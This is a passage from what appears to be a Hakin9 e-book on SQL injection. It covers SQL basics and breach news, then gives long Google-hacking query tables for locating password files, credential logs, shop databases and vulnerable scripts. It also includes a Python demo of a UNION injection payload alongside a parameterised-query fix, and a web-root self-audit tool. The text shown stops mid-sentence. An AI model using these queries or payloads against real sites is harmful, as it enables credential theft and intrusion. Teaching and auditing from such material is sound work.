Hacking with SQL Injections

Hakin9 Magazine | Hacking with SQL Injections
Table of Contents
Module 1 – Introduction to SQL as a Developer Tool
  Background Information
  Developer Information
  SQL Query Types
    Select statement
    Insert statement
    Update statement
    Delete statement
    Union Operator
    Minus operator
  SQL joins
  SQL data types
  SQL Clauses
    Distinct clause
    From Clause
    Where Clause
    Order by Clause
    Group by Clause
    Having Clause
Module 2 – Importance of SQL in Ethical Hacking
  Introduction
  Pre-requisites
  Importance of SQL
  Famous Websites that got hacked because of SQL Injection
    Bell Canada – News
    Hacker breaches Johns Hopkins University website
    Oracle’s MySQL.com hacked via SQL injection
    NASA sites hacked via SQL injection
    New mass SQL injection attack infects 56,000 websites
    Microsoft France hacked via SQL Injection
    Yahoo quickly fixes Flickr SQL injection, remote code execution flaws
  Google Hacking Database GHDB / Google hacking
    Vulnerable Servers
  Live Hacking
Module 3 – Writing SQL Injections
  Introduction
  Some Knowledge Base
  Authentication bypass – SQL Injection
  Union attack – SQL injection
  SQLMAP the SQL Injection Tool
Module 4 – SQL Injections in Access, MSSQL, ORACLE and MySQL Databases
  Introduction
    What we will cover
    How to Identify Background Database Type
  SQL Injections techniques for MySql Database
  SQL Injection techniques for MS SQL Server
  SQL injection Techniques for Oracle Database
  SQL Injection Techniques for MS Access Database
Module 5 – Setting up Lab for practicing SQL Injections
  Introduction
    Download Link
Module 1 – Introduction to SQL as a Developer Tool
Background Information
SQL is a standardized query language for requesting information from a database. The original
version called SEQUEL (structured English query language) was designed by an IBM research
center in 1974 and 1975.
Oracle Corporation first introduced SQL as a commercial database system in 1979. SQL (Structured
Query Language) is nothing but a computer language designed to store, manipulate, and query data
stored in relational databases.
It is a well-established and standardized language also recognized by ISO.org.
“ISO/IEC 9075 defines the SQL language. The scope of the SQL language is the definition of data structure and the operations on data stored in that structure. ISO/IEC 9075-1:2008, ISO/IEC 9075-2:2008 and ISO/IEC 9075-11:2008 encompass the minimum requirements of the language. Other parts define extensions.
ISO/IEC 9075-1:2008 specifies the conceptual framework used in other parts of ISO/IEC 9075 to specify the grammar of SQL and the result of processing statements in that language by an SQL-implementation.”
For more information visit http://www.iso.org/iso/catalogue_detail.htm?csnumber=45498.
Developer Information
SQL is not tied to any specific database. Its main job is to speak to the database in a well-defined, standard protocol that consists of different types of commands, instructions and statements.
SQL is commonly used with relational database technologies such as Oracle, Microsoft Access, SQL Server, MySQL, PostgreSQL and many more. We will present SQL in depth as a language for a developer, category by category.
In this module, we present the syntax and a short description of the following SQL statements and clauses. Some of this is standard information, similar to what is widely available on the Internet; in the upcoming module we move on to live website hacking using SQL injections.
To get there, however, you need to understand these concepts, so this module is important for building the initial knowledge base.
SQL Query Types
We will quickly explain the SQL query types shown in the figure.
Select statement
The SQL SELECT statement is used to retrieve records from one or more tables in your SQL database.
Syntax
The syntax for the SQL SELECT statement is:
SELECT expressions FROM tables WHERE conditions;
Let’s look at an example showing how to use the SQL SELECT statement to select all fields from a table.
SELECT * FROM table_name WHERE column = 'data';
Insert statement
The SQL INSERT statement is used to insert one or more records into a table.
Syntax
The syntax for the SQL INSERT statement when inserting a single record using the VALUES keyword is:
INSERT INTO table_name (column1, column2) VALUES (data1, data2);
Update statement
The SQL UPDATE statement is used to update existing records in the tables.
Syntax
The syntax for the SQL UPDATE statement when updating one table is:
UPDATE table SET column1 = expression1, column2 = expression2 WHERE conditions;
UPDATE table_name SET column_1 = data1 WHERE column_2 = 'match_data';
Delete statement
The SQL DELETE statement is used to delete one or more records from a table.
Syntax
The syntax for the SQL DELETE statement is:
DELETE FROM table_name WHERE conditions;
DELETE FROM table_name WHERE column_name = 'match_data';
Union Operator
The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
It removes duplicate rows between the various SELECT statements.
Each SELECT statement within the UNION must have the same number of fields in the result sets
with similar data types.
Syntax
The syntax for the SQL UNION operator is:
SELECT expression1, expression2 FROM tables WHERE conditions
UNION SELECT expression1, expression2 FROM tables WHERE conditions;
SELECT table_id FROM table_name UNION SELECT another_table_id FROM table_name;
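An added example (not from the Hakin9 text) showing why the column-count rule above matters for injection: a product search that splices its input into the statement, next to the same search with a bound parameter, run against a constructed in-memory SQLite database.

```python
"""Added example: a concatenated query beside its parameterised fix, on a
constructed SQLite database. Not code from the Hakin9 text."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a public product catalogue and a users table
    that the search feature is never meant to expose."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products (name, price) VALUES ('widget', 9.99), ('gadget', 19.99);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT);
        INSERT INTO users (username, pw_hash) VALUES ('alice', 'constructed-hash');
        """
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    """The bug: the caller's string is spliced into the statement text, so the
    database parses whatever the user typed as SQL syntax."""
    sql = "SELECT name, price FROM products WHERE name = '" + term + "'"
    return conn.execute(sql).fetchall()


def search_hardened(conn: sqlite3.Connection, term: str) -> list:
    """The fix: a bound parameter. The statement text is fixed and the value
    travels separately, so quotes and keywords inside it are data, not syntax."""
    sql = "SELECT name, price FROM products WHERE name = ?"
    return conn.execute(sql, (term,)).fetchall()


def error_text(conn: sqlite3.Connection, term: str):
    """Return the database error the vulnerable query raises, or None. A verbose
    error echoed to the browser is what the GHDB 'Error Messages' category indexes."""
    try:
        search_vulnerable(conn, term)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


# Constructed inputs: an ordinary search, a UNION that obeys the two-column rule
# from the text, and one that violates it.
NORMAL = "widget"
UNION_TWO_COLS = "x' UNION SELECT username, pw_hash FROM users --"
UNION_ONE_COL = "x' UNION SELECT username FROM users --"


def demo() -> dict:
    conn = make_db()
    return {
        "normal_vulnerable": search_vulnerable(conn, NORMAL),
        "normal_hardened": search_hardened(conn, NORMAL),
        # Two columns of compatible type: the UNION is accepted and the users
        # table rides out through the product search.
        "union_vulnerable": search_vulnerable(conn, UNION_TWO_COLS),
        # Same input through the bound parameter: no product has that literal
        # name, so the result is empty and nothing leaks.
        "union_hardened": search_hardened(conn, UNION_TWO_COLS),
        # Column-count mismatch: SQLite refuses the UNION, and the error text
        # confirms the injection point if it is ever shown to the client.
        "mismatch_error": error_text(conn, UNION_ONE_COL),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The defensive takeaways are the two that survive every database engine: bind values instead of concatenating them, and log the database error server-side rather than returning it to the browser.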
Minus operator
The SQL MINUS operator is used to return all rows in the first SELECT statement not returned in the
second SELECT statement.
Each SELECT statement within the MINUS query must have the same number of fields in the result
sets with similar data types.
SQL joins
SQL JOINS are used to retrieve data from multiple tables. An SQL JOIN is performed whenever two
or more tables are joined in an SQL statement.
There are 4 different types of SQL joins:
• SQL INNER JOIN (or sometimes called simple join)
• SQL LEFT OUTER JOIN (or sometimes called LEFT JOIN)
• SQL RIGHT OUTER JOIN (or sometimes called RIGHT JOIN)
• SQL FULL OUTER JOIN (or sometimes called FULL JOIN)
SQL data types
The following is a list of general SQL data types that may not be supported by all relational databases.
Data Type | Syntax | Explanation (if applicable)
integer | integer |
smallint | smallint |
numeric | numeric(p,s) | Where p is a precision value; s is a scale value. For example, numeric(6, 2) is a number that has 4 digits before the decimal and 2 digits after the decimal.
decimal | decimal(p,s) | Where p is a precision value; s is a scale value.
real | real | Single-precision floating point number
double precision | double precision | Double-precision floating point number
float | float(p) | Where p is a precision value.
character | char(x) | Where x is the number of characters to store. This data type is space padded to fill the number of characters specified.
character varying | varchar2(x) | Where x is the number of characters to store. This data type does NOT space pad.
bit | bit(x) | Where x is the number of bits to store.
bit varying | bit varying(x) | Where x is the number of bits to store. The length can vary up to x.
date | date | Stores year, month, and day values.
time | time | Stores the hour, minute, and second values.
timestamp | timestamp | Stores year, month, day, hour, minute, and second values.
time with time zone | time with time zone | Exactly the same as time, but also stores an offset from UTC of the time specified.
timestamp with time zone | timestamp with time zone | Exactly the same as timestamp, but also stores an offset from UTC of the time specified.
year-month interval | | Contains a year value, a month value, or both.
day-time interval | | Contains a day value, an hour value, a minute value, and/or a second value.
SQL Clauses
Distinct clause
The SQL DISTINCT clause is used to remove duplicates from the result set of a SELECT statement.
Syntax
The syntax for the SQL DISTINCT clause is:
SELECT DISTINCT expressions FROM tables WHERE conditions;
SELECT DISTINCT city FROM table_name;
From Clause
The SQL FROM clause is used to list the tables, and any joins required for the SQL statement.
Syntax
The syntax for the FROM Clause in SQL is:
SELECT column1, column2 FROM table_name;
SELECT * FROM suppliers WHERE city = 'Newark' ORDER BY city DESC;
Where Clause
The SQL WHERE clause is used to filter the results and apply conditions in a SELECT, INSERT,
UPDATE, or DELETE statement.
Syntax
The syntax for the SQL WHERE Clause is:
WHERE conditions;
SELECT * FROM table_name WHERE column_name = 'hakin9';
Order by Clause
The SQL ORDER BY clause is used to sort the records in the result set for a SELECT statement.
Syntax
The syntax for the SQL ORDER BY clause is:
SELECT expressions FROM tables WHERE conditions ORDER BY expression [ASC | DESC];
ASC is optional. It sorts the result set in ascending order by expression (the default if no modifier is provided).
DESC is optional. It sorts the result set in descending order by expression.
Group by Clause
The SQL GROUP BY clause can be used in a SELECT statement to collect data across multiple
records and group the results by one or more columns.
Syntax
The syntax for the SQL GROUP BY clause is:
SELECT department, SUM(sales) AS "Total sales" FROM order_details GROUP BY department;
Having Clause
The SQL HAVING clause is used in combination with the GROUP BY clause to restrict the groups of returned rows to only those for which the condition is TRUE.
Syntax
The syntax for the SQL HAVING Clause is:
SELECT department, MIN(salary) AS "Lowest salary" FROM employees GROUP BY department HAVING MIN(salary) > 35000;
Module 2 – Importance of SQL in Ethical Hacking
Introduction
In this module, we present the importance of SQL and SQL injections in the ethical hacking field. To do so, we also walk through live hacking with screenshots, so that you can learn from practical examples and see what it feels like to make it happen.
Pre-requisites
• Sound knowledge of HTML
• Basic knowledge of any one database server
• Understanding of how SQL works
• Prior experience as a software developer is a plus
Importance of SQL
If you think that hacking into any targeted network is easy, it is not that easy anymore, considering the advances in intrusion detection and intrusion prevention systems, firewalls and security awareness among industry people. The terminology of information security is very common now.
Whenever you perform ethical hacking, or let’s say penetration testing, you will face many difficulties in finding the actual security holes in the targeted network, and the easiest way to find bugs in the target is via its web applications. Since web applications are accessible with nothing more than a browser, you need to be good at hacking into web applications, which is nearly impossible without expertise in SQL and SQL injections.
We presented some basic knowledge of SQL in the previous module, covering what you need to know in order to move toward SQL injections.
Given the scenario discussed above, the only ways of finding vulnerabilities and hacking into the targeted system are as follows:
• Identify vulnerabilities in the Web Server
• Identify vulnerabilities in the Web Application
Web applications that work with a database connected in the background are more attractive to hackers, and of course there are more chances of identifying vulnerabilities in such cases.
Example
Here is how it works: you quickly scan a target IP address and find that the only accessible port on the target machine is port 80, which is the web. How will you proceed? You go and explore the web to find out what is available there. Let’s scan one target (live example) and see what the outcome is.
You can see from the results above that only port 80 is accessible (open); the other two are useless to us at this moment, as both are closed.
Famous Websites that got hacked because of SQL Injection
Bell Canada – News
“Bell Canada confirmed Sunday that usernames and passwords of 22,421 and five valid credit
card numbers have been leaked by hackers. However, the organization points finger at Third-party
saying the leak “results from illegal hacking of an Ottawa-based third-party supplier’s information
technology system”.
Bell claims its network wasn’t affected by this breach. Bell has disabled all passwords and is notifying all affected users. They are currently working with law enforcement and government security officials to investigate the matter. See more at:
• http://www.ehackingnews.com/2014/02/bell-confirms-database-leaked-by-nullcrew.html
• http://www.ehackingnews.com/2014/02/nullcrew-hackers-claims-to-have-hacked.html
Hacker breaches Johns Hopkins University website
A hacker claiming to be part of the Anonymous hacker group has breached the Johns Hopkins University website and leaked the data compromised from the database server. See more at: http://www.ehackingnews.com/2014/03/hacker-breaches-johns-hopkins.html.
Oracle’s MySQL.com hacked via SQL injection
Hackers over the weekend compromised Oracle’s MySQL.com customer website via SQL injection
and posted a list of usernames and passwords online.
Two Romanian hackers using the aliases “TinKode” and “NeOh” have taken responsibility for the attack and said they exploited an SQL injection flaw to break into the web servers hosting MySQL.com, a website for the popular open source database product (http://www.scmagazine.com/oraclesmysqlcom-hacked-via-sql-injection/article/199419/).
NASA sites hacked via SQL injection
Two NASA sites recently were hacked by an individual wanting to demonstrate that the sites are
susceptible to SQL injection.
The websites for NASA’s Instrument Systems and Technology Division and Software Engineering
Division were accessed by a researcher, who posted to his blog screen shots taken during the hack.
The researcher, using the alias “c0de.breaker,” used SQL injection to hijack the sites, Gunter Ollmann,
VP of research at security firm Damballa, who recently wrote about the hack, told SCMagazineUS.com
on Monday, http://www.scmagazine.com/nasa-sites-hacked-via-sql-injection/article/159181/.
New mass SQL injection attack infects 56,000 websites
Tens of thousands of websites have been compromised with a suite of malware containing backdoors,
password stealers and downloaders, according to a security firm.
“It’s a pretty potent concoction, from a malware perspective,” Mary Landesman, ScanSafe’s senior
security researcher, told SCMagazineUS.com on Monday.
So far, more than 56,000 sites have been compromised – via SQL injection – with a malicious IFRAME that loads exploits from several attacker-owned domains, Landesman said. The malware-hosting domains were registered between Aug. 3 and 9.
The compromised sites can be identified through a Google search for a malicious IFRAME script
tag. The infected sites vary in category, but a number of charitable, nursing and travel sites particularly
have been targeted (http://www.scmagazine.com/new-mass-sql-injection-attack-infects-56000websites/article/147178/).
Microsoft France hacked via SQL Injection
Acunetix secures web applications and prevents website defacement and irreversible damage to your company’s reputation. London, UK – 19 June, 2006 – One of the websites of Microsoft France
was attacked this weekend by a group of Turkish hackers who defaced the site by Web Server
intrusion. TiTHack, the handle used by the hackers, defaced experts.microsoft.fr by exploiting
a vulnerability found either in IIS6 or in one of the web applications running on the site.
The attack seems to have been done “for fun”. However, the defacement has already caused
Microsoft France significant embarrassment further damaging the corporation’s global reputation.
Bloggers immediately picked up on the defacement and were amused at how long it took Microsoft
to fix the problem. At time of writing, the website remains unavailable after at least 1 day in its state
of defacement (http://www.acunetix.com/blog/news/microsoft-france-hacked/).
Yahoo quickly fixes Flickr SQL injection, remote code execution flaws
A security researcher identified flaws in popular photo sharing service Flickr that could result in SQL
injection and remote code execution, but Yahoo acknowledged and quickly patched the problems
(http://www.scmagazine.com/yahoo-quickly-fixes-flickr-sql-injection-remote-code-execution-flaws/
article/342602/).
Google Hacking Database GHDB / Google hacking
Google hacking is the term widely used when a hacker tries to find exploitable targets and sensitive data using the Google search engine.
The Google Hacking Database (GHDB) is a database of queries that identify sensitive data!
The types of information you can gain by using Google queries are listed below. We will explain a couple of key queries in tabular form.
Advisories and Vulnerabilities
These searches locate vulnerable servers. These searches are often generated from various security
advisory posts, and in many cases are product or version-specific.
Error Messages
Really retarded error messages that say WAY too much!
Files containing juicy info
No usernames or passwords, but interesting stuff none the less.
Files containing passwords
PASSWORDS!!! Google found PASSWORDS!
Files containing usernames
These files contain usernames, but no passwords... Still, Google finding usernames on a web site.
The chart below is an extract from well-known security websites, which you might find difficult to compile by yourself. Keep this information with you at all times. These are some of the key queries you need to know and will require in your hacking attempts to learn more about usernames.
Title | Summary
bash_history files | Ok, this file contains what a user typed at a shell command prompt. You shouldn’t advertise this file. You shouldn’t flash it to a web crawl ...
sh_history files | Ok, this file contains what a user typed at a shell command prompt. You shouldn’t advertise this file. You shouldn’t flash it to a web crawl ...
inurl:admin inurl:userlist | This search reveals userlists of administrative importance. Userlists found using this method can range from benign “message group” lists to ...
inurl:admin filetype:asp inurl:userlist | This search reveals userlists of administrative importance. Userlists found using this method can range from benign “message group” lists to ...
“index of” / lck | These lock files often contain usernames of the user that has locked the file. Username harvesting can be done using this technique. ...
index.of perform.ini | This file contains information about the mIRC client and may include channel and user names. ...
inurl:php inurl:hlstats intext:”Server Userna... | This page shows the halflife stat script and reveals the username to the system. Table structure, database name and recent SQL queries are also shown ...
+intext:”webalizer” +intext:”Total ... | The webalizer program displays various information but this query displays usernames that have logged into the site. Attackers can use this information ...
filetype:reg reg HKEY_CURRENT_USER username | This search finds registry files from the Windows Operating system. Considered the “soul” of the system, these files, and snippets from thes ...
filetype:reg reg +intext:”internet account ma... | This google search reveals user names, pop3 passwords, email addresses, servers connected to and more. The IP addresses of the users can also be reve ...
filetype:log username putty | These log files record info about the SSH client PUTTY. These files contain usernames, site names, IP addresses, ports and various other information a ...
filetype:conf inurl:proftpd.conf -sample | A standard FTP configuration file that provides far too many details about how the server is setup, including installation paths, location of logfile ...
OWA Public folders & Address book | This search jumps right to the main page of Outlook Web Access Public Folders and the Exchange Address Book. An attacker can use the addressbook to e ...
intext:”SteamUserPassphrase=” intext:”... | This will search for usernames and passwords for steam (www.steampowered.com) taken from the SteamApp.cfg file. ...
site:extremetracking.com inurl:”login=” | The search reveals usernames (right in the URL in green) and links to the sites that are signed up with extremetracking.com. From here an attacker can ...
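An added example (not from the Hakin9 text, and not a GHDB tool): a small parser for the query syntax used in this section’s tables, turned into a self-audit that walks a web document root and flags files whose names a query’s filetype:/inurl: hints would pick up, so they can be removed before a crawler indexes them. The query strings are copied from this section’s tables; the document root and its files are constructed.

```python
"""Added example: parse GHDB-style queries and audit a constructed web root
for files they would expose. Not code from the Hakin9 text or from GHDB."""
import os
import re
import shutil
import tempfile

# One search term: optional -/+ prefix, optional operator (inurl:, filetype:, ...),
# then either a double-quoted phrase or a run of non-space characters.
TOKEN_RE = re.compile(r'([-+]?)(?:(\w+):)?(?:"([^"]*)"|(\S+))')


def parse_dork(dork: str) -> list:
    """Split a query into (operator, value, negated) triples.
    Plain words get operator None; quoted phrases keep their spaces."""
    terms = []
    for sign, op, quoted, bare in TOKEN_RE.findall(dork):
        value = quoted if quoted else bare
        terms.append((op.lower() if op else None, value, sign == "-"))
    return terms


def exposure_hints(dork: str) -> list:
    """Turn a query into file-name checks an operator can run locally:
    filetype:/ext: -> extension, inurl: -> path fragment, a bare dotted word
    such as my.cnf -> exact file name. Content words (intext:, intitle:) and
    negated terms carry no file-name information and are skipped."""
    hints = []
    for op, value, negated in parse_dork(dork):
        if negated:
            continue
        if op in ("filetype", "ext"):
            hints.append(("ext", value.lower()))
        elif op == "inurl":
            hints.append(("path", value.lower()))
        elif op is None and "." in value and " " not in value:
            hints.append(("name", value.lower()))
    return hints


def path_matches(rel_path: str, hints: list) -> bool:
    """All positive hints must hold, mirroring how the search engine ANDs terms."""
    if not hints:
        return False
    name = rel_path.rsplit("/", 1)[-1]
    for kind, value in hints:
        if kind == "ext" and not rel_path.endswith("." + value):
            return False
        if kind == "path" and value not in rel_path:
            return False
        if kind == "name" and name != value:
            return False
    return True


def audit_webroot(root: str, dorks: list) -> list:
    """Walk a document root and return (dork, relative_path) pairs for files
    that a query's file-name hints would pick up once a crawler indexes them."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            rel = os.path.relpath(os.path.join(dirpath, fn), root)
            rel = rel.replace(os.sep, "/").lower()
            for dork in dorks:
                if path_matches(rel, exposure_hints(dork)):
                    findings.append((dork, rel))
    return findings


# Query strings copied from the tables in this section.
SAMPLE_DORKS = [
    "inurl:admin filetype:asp inurl:userlist",
    "filetype:log username putty",
    "filetype:conf inurl:proftpd.conf -sample",
    "filetype:cnf my.cnf -cvs -example",
    "filetype:inc inc intext:setcookie",
]

# Constructed web root: two harmless files and five that should never be served.
SAMPLE_FILES = [
    "index.html", "images/logo.png", "admin/userlist.asp", "logs/putty.log",
    "conf/proftpd.conf", "mysql/my.cnf", "includes/db.inc",
]


def build_sample_root() -> str:
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel in SAMPLE_FILES:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed placeholder\n")
    return root


def run_demo() -> list:
    root = build_sample_root()
    try:
        return sorted(audit_webroot(root, SAMPLE_DORKS))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for dork, path in run_demo():
        print(f"{path:22s} <- {dork}")
```

Pointing audit_webroot at a real document root with the full list of queries from these tables gives an inventory of what a search engine would index; the fix for each hit is to move the file out of the web root or deny it in the server configuration.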
Footholds
Examples of queries that can help a hacker gain a foothold into a web server.
Pages containing login portals
These are login pages for various services. Consider them the front door of a website’s more
sensitive functions.
Pages containing network or vulnerability data
These pages contain such things as firewall logs, honeypot logs, network information, IDS logs... all
sorts of fun stuff!
Sensitive Directories
Google’s collection of web sites sharing sensitive directories. The files contained in here will vary
from sensitive to uber-secret!
Sensitive Online Shopping Info
Examples of queries that can reveal online shopping info like customer data, suppliers, orders, credit
card numbers, credit card info.
Title | Summary
POWERED BY HIT JAMMER 1.0! | Hit Jammer is a Unix compatible script that allows you to manage the content and traffic exchange and make web changes, all without needing HTML. It i ...
VP-ASP Shop Administrators only | VP-ASP (Virtual Programming – ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any ty ...
Comersus.mdb database | Comersus is an e-commerce system and has been installed all over the world in more than 20000 sites. Using Comersus does not require that you know any ...
inurl:shopdbtest.asp | shopdbtest is an ASP page used by several e-commerce products. A vulnerability in the script allows remote attackers to view the database location, and ...
“More Info about MetaCart Free” | MetaCart is an ASP based shopping Cart application with SQL database. A security vulnerability in the free demo version of the product (MetaCartFree) ...
inurl:midicart.mdb | MIDICART is an ASP and PHP based shopping Cart application with MS Access and SQL database. A security vulnerability in the product allows remote at ...
site:ups.com intitle:”Ups Package trackin... | Ever use the UPS Automated Tracking Service?? Wanna see where packages are going? Want to Man-in-the-middle their delivery? Well, then here it is.-Dig ...
intext:”powered by Hosting Controller” i... | Description:==============Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform. It is the onl ...
intext:”Powered by X-Cart: shopping cart soft... | X-Cart (version 4.0.8) has multiple input validation vulnerabilities. There doesn’t seem to be any way to search for specific versions of the sof ...
Various Online Devices
This category contains things like printers, video cameras, and all sorts of cool things found on the
web with Google.
Vulnerable Files
Many vulnerable files that Google can find on websites.
Title | Summary
intitle:”Index of /” modified php.exe | PHP installed as a cgi-bin on a Windows Apache server will allow an attacker to view arbitrary files on the hard disk, for example by requesting “ ...
filetype:php inurl:”viewfile” -”ind... | Programmers do strange things sometimes and forget about security. This search is the perfect example. These php scripts are written for viewing files ...
filetype:cnf my.cnf -cvs -example | The MySQL database system uses my.cnf files for configuration. It can include a lot of information, ranging from paths, database names up to passwords ...
filetype:wsdl wsdl | The XML headers are called *.wsdl files. They can include data, functions or objects. An attacker with knowledge of XML coding can sometimes do evil th ...
filetype:inc inc intext:setcookie | Cookies are often used for authentication and a lot of other stuff. The “inc” php header files often include the exact syntax of the cookies. ...
ext:cgi inurl:ubb6_test | The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so: CAUTION; Do not leave patht ...
intitle:”PHP Explorer” ext:php (inurl:ph... | This searches for PHP Explorer scripts. This looks like a file manager with some nice extra options for an attacker, such as phpinfo, create/list dire ...
inurl:robpoll.cgi filetype:cgi | robpoll.cgi is used to administrate polls. The default password used for adding polls is ‘robpoll’. All of the results should look something ...
inurl:”plog/reg ister.php”
pLog is a popular form of bloggin software. Currently there are estimated about 1450 sites
running it. The installation documents clearly warn about r ...
link:http://www.toastforums.com/
Toast Forums is an ASP message board on the Internet. Toast Forums also has all the features
of an advanced message board (see hxxp://www.toastforums. ...
inurl:"nph-proxy.cgi" "Start browsi...
Observing the web cracker in the wild, one feels like they are watching a bear. Like a bear stocks
up on food and then hibernates, a web cracker must ...
Gallery configuration setup files
Gallery is a popular images package for websites. Unfortunately, with so many users, more bugs
will be found and Google will find more installations. ...
PHP-Nuke – create super user right now !
PHP-Nuke is a popular web portal thingie. It has popped up in the Google dorks before. I think
we let this one describe itself, quoting from a vulnera ...
filetype:lit lit (books|ebooks)
Tired of web searching? Want something to read? You can find Ebooks (thousands of them) with
this search. LIT files can be opened with Microsoft Read ...
inurl:cgi.asx?StoreID
BeyondTV is a web-based software product which lets you manage your TV station. All you need
is to install a TV tuner card on your PC and connect your ...
inurl:"WWWADMIN.PL" intitle:"wwwad...
www.admin.pl is a script that allows a user with a valid username and password to delete files
and posts from the associated forum. ...
inurl:changepassword.cgi -cvs
Allows a user to change his/her password for authentication to the system. Script allows for
repeated failed attempts making this script vulnerable t ...
intitle:"Directory Listing" "tree v...
Dirlist is an ASP script that lists folders in an explorer style: * Tree * Detailed * Tiled Quote: *Lists
files and directories in either a Tree ...
intitle:mywebftp "Please enter your password&...
MyWebFTP Free is a free lite version of MyWebFTP Personal – a PHP script providing FTP client
capabilities with the user interface in your browser. In ...
ezBOO "Administrator Panel" -cvs
ezBOO WebStats is a high level statistical tool for web sites monitoring. It allows real time access
monitoring on several sites. Based on php and m ...
intitle:"ASP FileMan" Resend -site:iiswo...
FileMan is a corporate web based storage and file management solution for intra- and internet.
It runs on Microsoft IIS webservers and is written in A ...
intitle:"phpremoteview" filetype:php &qu...
phpRemoteView is a web-based file manager with a basic shell. With this an attacker can browse the
server filesystem and use the online php interpreter. vendor: ...
"File Upload Manager v1.3" "rename ...
thepeak file upload manager lets you manage your webtree with up- and downloading files. ...
inurl:click.php intext:PHPClickLog
A script written in PHP 4 which logs a user’s statistics when they click on a link. The log is stored
in a flatfile (text) database and can be ...
“powered by YellDL”
Finds websites using YellDL (also known as YellDownLoad), a download tracker written in
PHP. Unfortunately this downloader downloads everything you ...
filetype:cgi inurl:cachemgr.cgi
cachemgr.cgi is a management interface for the Squid proxy service. It was installed by default
in /cgi-bin by RedHat Linux 5.2 and 6.0 installed with ...
ext:asp inurl:DUgallery intitle:"3.0" -s...
The MS access database can be downloaded from inside the docroot. The user table holds the
admin password in plain text. Possible locations for the du ...
ext:asp "powered by DUForum" inurl:(mess...
DUForum is one of those free forum software packages. The database location is determined by
the config file “connDUforumAdmin.asp”, but the ...
“Powered by Land Down Under 601”
SQL injection vulnerability in Land Down Under 601 could give an attacker administrative access.
An exploit exists on the internet, search google. ...
inurl:php.exe filetype:exe -example.com
It is possible to read any file remotely on the server with PHP.EXE (assuming a script alias for it
is enabled), even across drives. (Note: The GHDB h ...
filetype:mdb inurl:"news/news"
Web Wiz Site News unprotected database holds config and admin information in a Microsoft
Access database in news/news.mdb. This information is almost ...
filetype:pl -intext:"/usr/bin/perl" inu...
WebCal allows you to create and maintain an interactive events calendar or scheduling system
on your Web site. The file names explain themselves, but ...
inurl:cgi-bin inurl:bigate.cgi
Anonymous surfing with bigate.cgi. Remove http:// when you copy paste or it won’t work. ...
intitle:"SSHVnc Applet" OR intitle:"...
SSHTerm Applet and SSHVnc Applet pages. ...
intitle:"PHPstat" intext:"Browser &q...
Phpstat shows nice statistical information about a website's visitors. Certain versions also
contain vulnerabilities: http://www.soulblack.co ...
filetype:mdb “standard jet”
These Microsoft Access Database files may contain usernames, passwords or simply prompts
for such data. ...
“Powered by Gravity Board”
4.22 07/08/2005 Gravity Board X v1.1 (possibly prior versions) Remote code execution, SQL
Injection / Login Bypass, cross site scripting, path disclos ...
“Powered by SilverNews”
silvernews 2.0.3 (possibly previous versions ) SQL Injection / Login Bypass / Remote commands
execution / cross site scripting software: author site: ...
PHPFreeNews inurl:Admin.php
29/07/2005 8.36.03 PHPFreeNews Version 1.32 (& previous) sql injection/login bypass, cross
site scripting, path disclosure, information disclosure ...
inurl:nquser.php filetype:php
Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc
exploit software: author site: http://www.virtech.org/tools/ ...
"Powered By: Simplicity oF Upload" inurl...
26/07/2005 16.09.18 Simplicity OF Upload 1.3 (possibly prior versions) remote code execution &
cross site scripting software: author site: http://www ...
"Powered by FlexPHPNews" inurl:news | in...
24/07/2005 2.38.13 Flex PHPNews 0.0.4 login bypass/ sql injection, cross site scripting &
resource consumption poc exploit software: author site: http ...
“Powered by FunkBoard”
FunkBoard V0.66CF (possibly prior versions) cross site scripting, possible database username/
password disclosure & board takeover, possible remote ...
“Powered by Xcomic”
"Powered by xcomic" this is a recent exploit, you can retrieve any file on the target system by using
"../" chars and null byte (%00), e ...
"Warning:" "Cannot execute a blank ...
"Warning: passthru(): Cannot execute a blank command in" "Warning: system(): Cannot execute
a blank command in" "Warning: exe ...
"Mail-it Now!" intitle:"Contact for...
Mail-it Now! 1.5 (possibly prior versions) contact.php remote code execution site: http://www.
skyminds.net/source/ description: a mail form script vulner ...
"maxwebportal" inurl:"default"...
several vulnerabilities relating to this. MaxWebPortal is a web portal and online community
system which includes features such as web-based administra ...
"e107.org 2002/2003" inurl:forum_post.ph...
e107 is prone to an input validation vulnerability. This issue is due to a failure in the application
to properly sanitize user-supplied input. Success ...
inurl:cartwiz/store/index.asp
The CartWIZ eCommerce Shopping Cart System will help you build your online store through an
interactive web-based e-commerce administration interface. ...
intitle:"Control panel" "Control Pa...
Build, manage and customize your own search engine friendly news / article site from scratch
– with absolutely no technical experience. Authentication ...
“powered by my little forum”
My Little Forum 1.5 / 1.6beta SQL Injection software: site: http://www.mylittlehomepage.net/my_
little_forum software: "A simple web-forum that suppo ...
“powered by mailgust”
MailGust 1.9/2.0 (possibly prior versions) SQL injection / board takeover software: site: http://
www.mailgust.org/ description: Mailgust is three softwares ...
intitle:”CJ Link Out V1”
A cross site scripting vulnerability has been discovered in CJ linkout version 1.x. CJ linkout is a
free product which allows you to easily let users c ...
inurl:guestbook/guestbooklist.asp "Post Date&...
A sql vulnerability has been reported in a Techno Dreams asp script, login.asp. http://search.
securityfocus.com/archive/1/414708/30/0/threaded Several ...
inurl:updown.php | intext:"Powered by PHP Upl...
this (evil) script lets you upload a php shell on the target server, in most cases not password
protected. dork: inurl:updown.php | intext:"Powere ...
inurl:"simplenews/admin"
hxxp://evuln.com/vulns/94/summary.html ...
Vulnerable Servers
These searches reveal servers with specific vulnerabilities. These are found in a different way than
